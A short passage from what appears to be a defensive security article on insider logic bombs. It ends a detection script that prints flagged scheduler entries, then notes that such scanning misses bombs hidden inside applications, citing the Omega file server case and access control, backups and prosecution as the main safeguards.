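        print(f.line)
        for r in f.reasons:
            print("   -", r)
```

This only catches bombs that use the scheduler as their trigger; a condition buried inside an application (Lloyd's bomb lived in the Omega file server's own startup sequence) needs code review of whatever the insider could write to, which is why the list above leans on access control, backups and the deterrent of prosecution rather than on detection alone.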